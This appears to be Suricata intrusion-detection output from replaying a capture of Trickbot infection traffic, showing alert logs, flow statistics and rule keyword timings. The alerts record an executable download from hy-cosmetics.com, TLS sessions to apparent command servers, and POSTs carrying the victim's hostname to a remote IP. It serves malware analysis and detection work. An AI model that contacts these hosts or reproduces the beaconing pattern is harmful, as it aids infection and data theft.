app_layer.tx.dns_udp                       | Total                     | 7
flow_mgr.closed_pruned                     | Total                     | 1
flow.spare                                 | Total                     | 10000
flow_mgr.flows_checked                     | Total                     | 16
flow_mgr.flows_notimeout                   | Total                     | 13
flow_mgr.flows_timeout                     | Total                     | 3
flow_mgr.flows_timeout_inuse               | Total                     | 2
flow_mgr.flows_removed                     | Total                     | 1
flow_mgr.rows_checked                      | Total                     | 65536
flow_mgr.rows_skipped                      | Total                     | 65520
flow_mgr.rows_maxlen                       | Total                     | 1
tcp.memuse                                 | Total                     | 573440
tcp.reassembly_memuse                      | Total                     | 81920
flow.memuse                                | Total                     | 7079776


eve.json - (28759 bytes)
{"timestamp":"2019-01-30T21:03:50.794981+0000","flow_id":1517736504467813,"pcap_cnt":1,"event_type":"dns","src_ip":"10.1.30.101","src_port":61297,"dest_ip":"10.1.30.1","dest_port":53,"proto":"UDP","dns":{"type":"query","id":6097,"rrname":"hy-cosmetics.com","rrtype":"A","tx_id":0}}
{"timestamp":"2019-01-30T21:03:50.821058+0000","flow_id":1517736504467813,"pcap_cnt":2,"event_type":"dns","src_ip":"10.1.30.1","src_port":53,"dest_ip":"10.1.30.101","dest_port":61297,"proto":"UDP","dns":{"type":"answer","id":6097,"rcode":"NOERROR","rrname":"hy-cosmetics.com","rrtype":"A","ttl":6494,"rdata":"37.59.247.21"}}
{"timestamp":"2019-01-30T21:03:51.319533+0000","flow_id":1840385185201884,"pcap_cnt":46,"event_type":"alert","src_ip":"37.59.247.21","src_port":80,"dest_ip":"10.1.30.101","dest_port":49194,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2018959,"rev":3,"signature":"ET POLICY PE EXE or DLL Windows file download HTTP","category":"Potential Corporate Privacy Violation","severity":1},"app_proto":"http"}
{"timestamp":"2019-01-30T21:03:51.319533+0000","flow_id":1840385185201884,"pcap_cnt":46,"event_type":"alert","src_ip":"37.59.247.21","src_port":80,"dest_ip":"10.1.30.101","dest_port":49194,"proto":"TCP","app_proto":"http","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2016538,"rev":3,"signature":"ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download","category":"Potentially Bad Traffic","severity":2}}
{"timestamp":"2019-01-30T21:03:51.783811+0000","flow_id":1840385185201884,"pcap_cnt":222,"event_type":"http","src_ip":"10.1.30.101","src_port":49194,"dest_ip":"37.59.247.21","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"hy-cosmetics.com","url":"\/pro.ime"}}
{"timestamp":"2019-01-30T21:04:05.396575+0000","flow_id":669620050815238,"pcap_cnt":231,"event_type":"tls","src_ip":"10.1.30.101","src_port":49197,"dest_ip":"190.14.158.193","dest_port":449,"proto":"TCP","tls":{"subject":"C=AU, ST=Some-State, O=Internet Widgits Pty Ltd","issuerdn":"C=AU, ST=Some-State, O=Internet Widgits Pty Ltd"}}
{"timestamp":"2019-01-30T21:04:05.406223+0000","flow_id":669620050815238,"pcap_cnt":233,"event_type":"alert","src_ip":"190.14.158.193","src_port":449,"dest_ip":"10.1.30.101","dest_port":49197,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2011540,"rev":6,"signature":"ET POLICY OpenSSL Demo CA - Internet Widgits Pty (O)","category":"Not Suspicious Traffic","severity":3},"app_proto":"tls"}
{"timestamp":"2019-01-30T21:04:07.660901+0000","flow_id":159423033447845,"pcap_cnt":239,"event_type":"dns","src_ip":"10.1.30.101","src_port":58156,"dest_ip":"10.1.30.1","dest_port":53,"proto":"UDP","dns":{"type":"query","id":53857,"rrname":"api.ipify.org","rrtype":"A","tx_id":0}}
{"timestamp":"2019-01-30T21:04:07.690476+0000","flow_id":159423033447845,"pcap_cnt":240,"event_type":"dns","src_ip":"10.1.30.1","src_port":53,"dest_ip":"10.1.30.101","dest_port":58156,"proto":"UDP","dns":{"type":"answer","id":53857,"rcode":"NOERROR","rrname":"api.ipify.org","rrtype":"CNAME","ttl":200,"rdata":"nagano-19599.herokussl.com"}}
{"timestamp":"2019-01-30T21:04:07.690476+0000","flow_id":159423033447845,"pcap_cnt":240,"event_type":"dns","src_ip":"10.1.30.1","src_port":53,"dest_ip":"10.1.30.101","dest_port":58156,"proto":"UDP","dns":{"type":"answer","id":53857,"rcode":"NOERROR","rrname":"nagano-19599.herokussl.com","rrtype":"CNAME","ttl":3058,"rdata":"elb097307-934924932.us-east-1.elb.amazonaws.com"}}
{"timestamp":"2019-01-30T21:04:07.690476+0000","flow_id":159423033447845,"pcap_cnt":240,"event_type":"dns","src_ip":"10.1.30.1","src_port":53,"dest_ip":"10.1.30.101","dest_port":58156,"proto":"UDP","dns":{"type":"answer","id":53857,"rcode":"NOERROR","rrname":"elb097307-934924932.us-east-1.elb.amazonaws.com","rrtype":"A","ttl":38,"rdata":"107.22.215.20"}}
{"timestamp":"2019-01-30T21:04:07.690476+0000","flow_id":159423033447845,"pcap_cnt":240,"event_type":"dns","src_ip":"10.1.30.1","src_port":53,"dest_ip":"10.1.30.101","dest_port":58156,"proto":"UDP","dns":{"type":"answer","id":53857,"rcode":"NOERROR","rrname":"elb097307-934924932.us-east-1.elb.amazonaws.com","rrtype":"A","ttl":38,"rdata":"54.243.123.39"}}
{"timestamp":"2019-01-30T21:04:07.690476+0000","flow_id":159423033447845,"pcap_cnt":240,"event_type":"dns","src_ip":"10.1.30.1","src_port":53,"dest_ip":"10.1.30.101","dest_port":58156,"proto":"UDP","dns":{"type":"answer","id":53857,"rcode":"NOERROR","rrname":"elb097307-934924932.us-east-1.elb.amazonaws.com","rrtype":"A","ttl":38,"rdata":"50.16.248.221"}}
{"timestamp":"2019-01-30T21:04:07.690476+0000","flow_id":159423033447845,"pcap_cnt":240,"event_type":"dns","src_ip":"10.1.30.1","src_port":53,"dest_ip":"10.1.30.101","dest_port":58156,"proto":"UDP","dns":{"type":"answer","id":53857,"rcode":"NOERROR","rrname":"elb097307-934924932.us-east-1.elb.amazonaws.com","rrtype":"A","ttl":38,"rdata":"50.19.247.198"}}
{"timestamp":"2019-01-30T21:04:07.690476+0000","flow_id":159423033447845,"pcap_cnt":240,"event_type":"dns","src_ip":"10.1.30.1","src_port":53,"dest_ip":"10.1.30.101","dest_port":58156,"proto":"UDP","dns":{"type":"answer","id":53857,"rcode":"NOERROR","rrname":"elb097307-934924932.us-east-1.elb.amazonaws.com","rrtype":"A","ttl":38,"rdata":"54.204.36.156"}}
{"timestamp":"2019-01-30T21:04:07.690476+0000","flow_id":159423033447845,"pcap_cnt":240,"event_type":"dns","src_ip":"10.1.30.1","src_port":53,"dest_ip":"10.1.30.101","dest_port":58156,"proto":"UDP","dns":{"type":"answer","id":53857,"rcode":"NOERROR","rrname":"elb097307-934924932.us-east-1.elb.amazonaws.com","rrtype":"A","ttl":38,"rdata":"23.21.121.219"}}
{"timestamp":"2019-01-30T21:04:08.783070+0000","flow_id":2054532255682294,"pcap_cnt":254,"event_type":"tls","src_ip":"10.1.30.101","src_port":49199,"dest_ip":"107.22.215.20","dest_port":443,"proto":"TCP","tls":{"subject":"OU=Domain Control Validated, OU=PositiveSSL Wildcard, CN=*.ipify.org","issuerdn":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Domain Validation Secure Server CA"}}
{"timestamp":"2019-01-30T21:04:10.762144+0000","flow_id":628319645729144,"pcap_cnt":271,"event_type":"alert","src_ip":"92.38.135.151","src_port":447,"dest_ip":"10.1.30.101","dest_port":49200,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2810654,"rev":4,"signature":"ETPRO POLICY Possibly Suspicious example.com SSL Cert","category":"A Network Trojan was detected","severity":1},"app_proto":"tls"}
{"timestamp":"2019-01-30T21:04:10.762620+0000","flow_id":628319645729144,"pcap_cnt":273,"event_type":"tls","src_ip":"10.1.30.101","src_port":49200,"dest_ip":"92.38.135.151","dest_port":447,"proto":"TCP","tls":{"subject":"C=GB, ST=London, L=London, O=Global Security, OU=IT Department, CN=example.com","issuerdn":"C=GB, ST=London, L=London, O=Global Security, OU=IT Department, CN=example.com"}}
{"timestamp":"2019-01-30T21:04:10.771347+0000","flow_id":628319645729144,"pcap_cnt":275,"event_type":"alert","src_ip":"92.38.135.151","src_port":447,"dest_ip":"10.1.30.101","dest_port":49200,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2021013,"rev":6,"signature":"ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex CnC)","category":"A Network Trojan was detected","severity":1},"app_proto":"tls"}
{"timestamp":"2019-01-30T21:04:10.771347+0000","flow_id":628319645729144,"pcap_cnt":275,"event_type":"alert","src_ip":"92.38.135.151","src_port":447,"dest_ip":"10.1.30.101","dest_port":49200,"proto":"TCP","app_proto":"tls","alert":{"action":"allowed","gid":1,"signature_id":2810654,"rev":4,"signature":"ETPRO POLICY Possibly Suspicious example.com SSL Cert","category":"A Network Trojan was detected","severity":1}}
{"timestamp":"2019-01-30T21:04:59.535170+0000","flow_id":2041806270841738,"pcap_cnt":2942,"event_type":"tls","src_ip":"10.1.30.101","src_port":49201,"dest_ip":"190.14.158.193","dest_port":449,"proto":"TCP","tls":{"subject":"C=AU, ST=Some-State, O=Internet Widgits Pty Ltd","issuerdn":"C=AU, ST=Some-State, O=Internet Widgits Pty Ltd"}}
{"timestamp":"2019-01-30T21:04:59.542845+0000","flow_id":2041806270841738,"pcap_cnt":2944,"event_type":"alert","src_ip":"190.14.158.193","src_port":449,"dest_ip":"10.1.30.101","dest_port":49201,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2011540,"rev":6,"signature":"ET POLICY OpenSSL Demo CA - Internet Widgits Pty (O)","category":"Not Suspicious Traffic","severity":3},"app_proto":"tls"}
{"timestamp":"2019-01-30T21:05:01.993038+0000","flow_id":1939759995579485,"pcap_cnt":2968,"event_type":"tls","src_ip":"10.1.30.101","src_port":49202,"dest_ip":"190.14.158.193","dest_port":449,"proto":"TCP","tls":{"subject":"C=AU, ST=Some-State, O=Internet Widgits Pty Ltd","issuerdn":"C=AU, ST=Some-State, O=Internet Widgits Pty Ltd"}}
{"timestamp":"2019-01-30T21:05:01.999394+0000","flow_id":1939759995579485,"pcap_cnt":2970,"event_type":"alert","src_ip":"190.14.158.193","src_port":449,"dest_ip":"10.1.30.101","dest_port":49202,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2011540,"rev":6,"signature":"ET POLICY OpenSSL Demo CA - Internet Widgits Pty (O)","category":"Not Suspicious Traffic","severity":3},"app_proto":"tls"}
{"timestamp":"2019-01-30T21:05:22.548371+0000","flow_id":1405730205864804,"pcap_cnt":3158,"event_type":"alert","src_ip":"10.1.30.101","src_port":49203,"dest_ip":"24.247.181.125","dest_port":8082,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2018358,"rev":7,"signature":"ET INFO GENERIC SUSPICIOUS POST to Dotted Quad with Fake Browser 1","category":"Potentially Bad Traffic","severity":2},"app_proto":"http"}
{"timestamp":"2019-01-30T21:05:22.548371+0000","flow_id":1405730205864804,"pcap_cnt":3158,"event_type":"http","src_ip":"10.1.30.101","src_port":49203,"dest_ip":"24.247.181.125","dest_port":8082,"proto":"TCP","tx_id":0,"http":{"hostname":"24.247.181.125","url":"\/ser0130us\/BRONSON-PC_W617601.9A539CBEA91F2D8402D649FD6638406A\/81\/","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident\/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)","http_content_type":"text\/plain"}}
{"timestamp":"2019-01-30T21:05:22.548600+0000","flow_id":1405730205864804,"pcap_cnt":3160,"event_type":"fileinfo","src_ip":"24.247.181.125","src_port":8082,"dest_ip":"10.1.30.101","dest_port":49203,"proto":"TCP","http":{"hostname":"24.247.181.125","url":"\/ser0130us\/BRONSON-PC_W617601.9A539CBEA91F2D8402D649FD6638406A\/81\/","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident\/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)","http_content_type":"text\/plain","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":3},"app_proto":"http","fileinfo":{"filename":"\/ser0130us\/BRONSON-PC_W617601.9A539CBEA91F2D8402D649FD6638406A\/81\/","gaps":false,"state":"CLOSED","stored":false,"size":3,"tx_id":0}}
{"timestamp":"2019-01-30T21:06:07.110045+0000","flow_id":568082737020331,"pcap_cnt":3243,"event_type":"alert","src_ip":"10.1.30.101","src_port":49204,"dest_ip":"24.247.181.125","dest_port":8082,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2018358,"rev":7,"signature":"ET INFO GENERIC SUSPICIOUS POST to Dotted Quad with Fake Browser 1","category":"Potentially Bad Traffic","severity":2},"app_proto":"http"}
{"timestamp":"2019-01-30T21:06:07.110045+0000","flow_id":568082737020331,"pcap_cnt":3243,"event_type":"http","src_ip":"10.1.30.101","src_port":49204,"dest_ip":"24.247.181.125","dest_port":8082,"proto":"TCP","tx_id":0,"http":{"hostname":"24.247.181.125","url":"\/ser0130us\/BRONSON-PC_W617601.9A539CBEA91F2D8402D649FD6638406A\/83\/","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident\/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)","http_content_type":"text\/plain"}}
{"timestamp":"2019-01-30T21:06:07.110317+0000","flow_id":568082737020331,"pcap_cnt":3245,"event_type":"fileinfo","src_ip":"24.247.181.125","src_port":8082,"dest_ip":"10.1.30.101","dest_port":49204,"proto":"TCP","http":{"hostname":"24.247.181.125","url":"\/ser0130us\/BRONSON-PC_W617601.9A539CBEA91F2D8402D649FD6638406A\/83\/","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident\/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)","http_content_type":"text\/plain","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":3},"app_proto":"http","fileinfo":{"filename":"\/ser0130us\/BRONSON-PC_W617601.9A539CBEA91F2D8402D649FD6638406A\/83\/","gaps":false,"state":"CLOSED","stored":false,"size":3,"tx_id":0}}
{"timestamp":"2019-01-30T21:06:10.021646+0000","flow_id":1225500496305908,"pcap_cnt":3265,"event_type":"alert","src_ip":"10.1.30.101","src_port":49205,"dest_ip":"24.247.181.125","dest_port":8082,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2018358,"rev":7,"signature":"ET INFO GENERIC SUSPICIOUS POST to Dotted Quad with Fake Browser 1","category":"Potentially Bad Traffic","severity":2},"app_proto":"http"}
{"timestamp":"2019-01-30T21:06:10.021646+0000","flow_id":1225500496305908,"pcap_cnt":3265,"event_type":"http","src_ip":"10.1.30.101","src_port":49205,"dest_ip":"24.247.181.125","dest_port":8082,"proto":"TCP","tx_id":0,"http":{"hostname":"24.247.181.125","url":"\/ser0130us\/BRONSON-PC_W617601.9A539CBEA91F2D8402D649FD6638406A\/81\/","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident\/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)","http_content_type":"text\/plain"}}
{"timestamp":"2019-01-30T21:06:10.021854+0000","flow_id":1225500496305908,"pcap_cnt":3267,"event_type":"fileinfo","src_ip":"24.247.181.125","src_port":8082,"dest_ip":"10.1.30.101","dest_port":49205,"proto":"TCP","http":{"hostname":"24.247.181.125","url":"\/ser0130us\/BRONSON-PC_W617601.9A539CBEA91F2D8402D649FD6638406A\/81\/","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident\/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)","http_content_type":"text\/plain","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":3},"app_proto":"http","fileinfo":{"filename":"\/ser0130us\/BRONSON-PC_W617601.9A539CBEA91F2D8402D649FD6638406A\/81\/","gaps":false,"state":"CLOSED","stored":false,"size":3,"tx_id":0}}
{"timestamp":"2019-01-30T21:06:28.324763+0000","flow_id":1145156691883163,"pcap_cnt":3276,"event_type":"dns","src_ip":"10.1.30.101","src_port":59778,"dest_ip":"10.1.30.1","dest_port":53,"proto":"UDP","dns":{"type":"query","id":64962,"rrname":"112.146.66.173.zen.spamhaus.org","rrtype":"A","tx_id":0}}
{"timestamp":"2019-01-30T21:06:28.355809+0000","flow_id":1145156691883163,"pcap_cnt":3277,"event_type":"dns","src_ip":"10.1.30.1","src_port":53,"dest_ip":"10.1.30.101","dest_port":59778,"proto":"UDP","dns":{"type":"answer","id":64962,"rcode":"NXDOMAIN","rrname":"112.146.66.173.zen.spamhaus.org"}}
{"timestamp":"2019-01-30T21:06:28.355809+0000","flow_id":1145156691883163,"pcap_cnt":3277,"event_type":"dns","src_ip":"10.1.30.1","src_port":53,"dest_ip":"10.1.30.101","dest_port":59778,"proto":"UDP","dns":{"type":"answer","id":64962,"rcode":"NXDOMAIN","rrname":"zen.spamhaus.org","rrtype":"SOA","ttl":10}}
{"timestamp":"2019-01-30T21:06:28.356445+0000","flow_id":2203449518485597,"pcap_cnt":3278,"event_type":"dns","src_ip":"10.1.30.101","src_port":50548,"dest_ip":"10.1.30.1","dest_port":53,"proto":"UDP","dns":{"type":"query","id":32949,"rrname":"112.146.66.173.cbl.abuseat.org","rrtype":"A","tx_id":0}}
{"timestamp":"2019-01-30T21:06:28.402791+0000","flow_id":2203449518485597,"pcap_cnt":3279,"event_type":"dns","src_ip":"10.1.30.1","src_port":53,"dest_ip":"10.1.30.101","dest_port":50548,"proto":"UDP","dns":{"type":"answer","id":32949,"rcode":"NXDOMAIN","rrname":"112.146.66.173.cbl.abuseat.org"}}
{"timestamp":"2019-01-30T21:06:28.402791+0000","flow_id":2203449518485597,"pcap_cnt":3279,"event_type":"dns","src_ip":"10.1.30.1","src_por

This file has been truncated.


keyword_perf.log - (16805 bytes)
  --------------------------------------------------------------------------------------------------------------------------------
  Date: 1/31/2019 -- 09:00:39
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: total
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  flags            9690            3               3               4019            3230.00         3230.00         0.00           
  dsize            13419           4               4               3997            3354.00         3354.00         0.00           
  flow             6015679         1904            1904            102079          3159.00         3159.00         0.00           
  threshold        54788           4               1               38445           13697.00        38445.00        5447.00        
  content          43108291        3464            1249            8520512         12444.00        18984.00        8756.00        
  pcre             1459063         283             83              28466           5155.00         5106.00         5175.00        
  byte_test        828697          265             136             15761           3127.00         3160.00         3092.00        
  byte_jump        253801          70              62              24221           3625.00         3292.00         6204.00        
  isdataat         44501           16              7               3748            2781.00         2826.00         2746.00        
  flowbits         2029750         684             51              24932           2967.00         4034.00         2881.00        
  urilen           398743          98              51              51335           4068.00         4072.00         4064.00        
  byte_extract     32686           12              12              3979            2723.00         2723.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: packet
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  flags            9690            3               3               4019            3230.00         3230.00         0.00           
  dsize            13419           4               4               3997            3354.00         3354.00         0.00           
  flow             6015679         1904            1904            102079          3159.00         3159.00         0.00           
  flowbits         1925202         667             34              19188           2886.00         2976.00         2881.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: packet/stream payload
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          12180366        1589            581             458960          7665.00         9898.00         6378.00        
  pcre             482097          105             49              28466           4591.00         3953.00         5149.00        
  byte_test        828697          265             136             15761           3127.00         3160.00         3092.00        
  byte_jump        188352          50              42              24221           3767.00         3302.00         6204.00        
  isdataat         32702           12              3               2995            2725.00         2662.00         2746.00        
  byte_extract     32686           12              12              3979            2723.00         2723.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: post-match
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  flowbits         104548          17              17              24932           6149.00         6149.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: threshold
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  threshold        54788           4               1               38445           13697.00        38445.00        5447.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_uri
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          400148          109             33              5042            3671.00         3847.00         3594.00        
  pcre             326121          54              1               23858           6039.00         23858.00        5703.00        
  urilen           398743          98              51              51335           4068.00         4072.00         4064.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_client_body
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          308442          52              16              30772           5931.00         6061.00         5873.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_response_line
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          23037           7               0               3752            3291.00         0.00            3291.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: file_data
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          26536046        697             201             8520512         38071.00        79471.00        21294.00       
  pcre             292247          68              0               25083           4297.00         0.00            4297.00        
  byte_jump        65449           20              20              7275            3272.00         3272.00         0.00           
  isdataat         11799           4               4               3748            2949.00         2949.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_header
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          1588417         371             303             49553           4281.00         4194.00         4668.00        
  pcre             268926          44              27              18594           6111.00         6047.00         6214.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_header_names
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          153668          40              27              5281            3841.00         3778.00         3972.00        
  pcre             13725           3               0               4894            4575.00         0.00            4575.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_content_len
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          13241           3               3               4921            4413.00         4413.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_raw_header
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          12007           3               0               4450            4002.00         0.00            4002.00        
  pcre             32956           3               0               19669           10985.00        0.00            10985.00       
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_method
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          52456           14              10              5069            3746.00         3712.00         3834.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_user_agent
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          365406          86              55              33156           4248.00         4865.00         3154.00        
  pcre             42991           6               6               20103           7165.00         7165.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_stat_msg
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          10844           3               0               4370            3614.00         0.00            3614.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_stat_code
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          35409           10              10              4417            3540.00         3540.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: tls_cert_subject
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          36184           10              10              4944            3618.00         3618.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: tls_cert_serial
  -------------------------------------------------------------------------------------------------------

This file has been truncated.


IDSDeathBlossom.py.log - (1177 bytes)
2019-01-31 09:00:17,373 - INFO - __init__ - /opt/IDSDeathBlossom/IDSDeathBlossom.py +38 - DBType: MYSQL
2019-01-31 09:00:18,073 - INFO - <module> - /opt/IDSDeathBlossom/IDSDeathBlossom.py +247 - Runmode set to run
2019-01-31 09:00:18,073 - INFO - <module> - /opt/IDSDeathBlossom/IDSDeathBlossom.py +248 - Targets set to suricata-4.0.0-etpro-all
2019-01-31 09:00:18,073 - INFO - run - /opt/IDSDeathBlossom/IDSDeathBlossom.py +320 - looping 1 times in runmode run
2019-01-31 09:00:18,073 - INFO - run - /opt/IDSDeathBlossom/IDSDeathBlossom.py +330 - run with success 0 out of 1
2019-01-31 09:00:18,074 - INFO - execute - /opt/IDSDeathBlossom/IDSDeathBlossom.py +207 - Executing: /opt/suricata400/bin/suricata -c /opt/suricata400/etc/etpro/suricata400-etpro-all.yaml -l /var/www/html/27c27f6013451b522f979b5a048809f156b33745cb75ec8c950e11a498e082d2 -r /var/pcap/01312019.0900-2019-01-30-Trickbot-infection-traffic.pcap -vvv -k none
2019-01-31 09:00:39,252 - INFO - run_ids - /opt/IDSDeathBlossom/IDSDeathBlossom.py +244 - suricata ran successfully
2019-01-31 09:00:39,252 - INFO - <module> - /opt/IDSDeathBlossom/IDSDeathBlossom.py +275 - Total time for the idstool 21.8865549564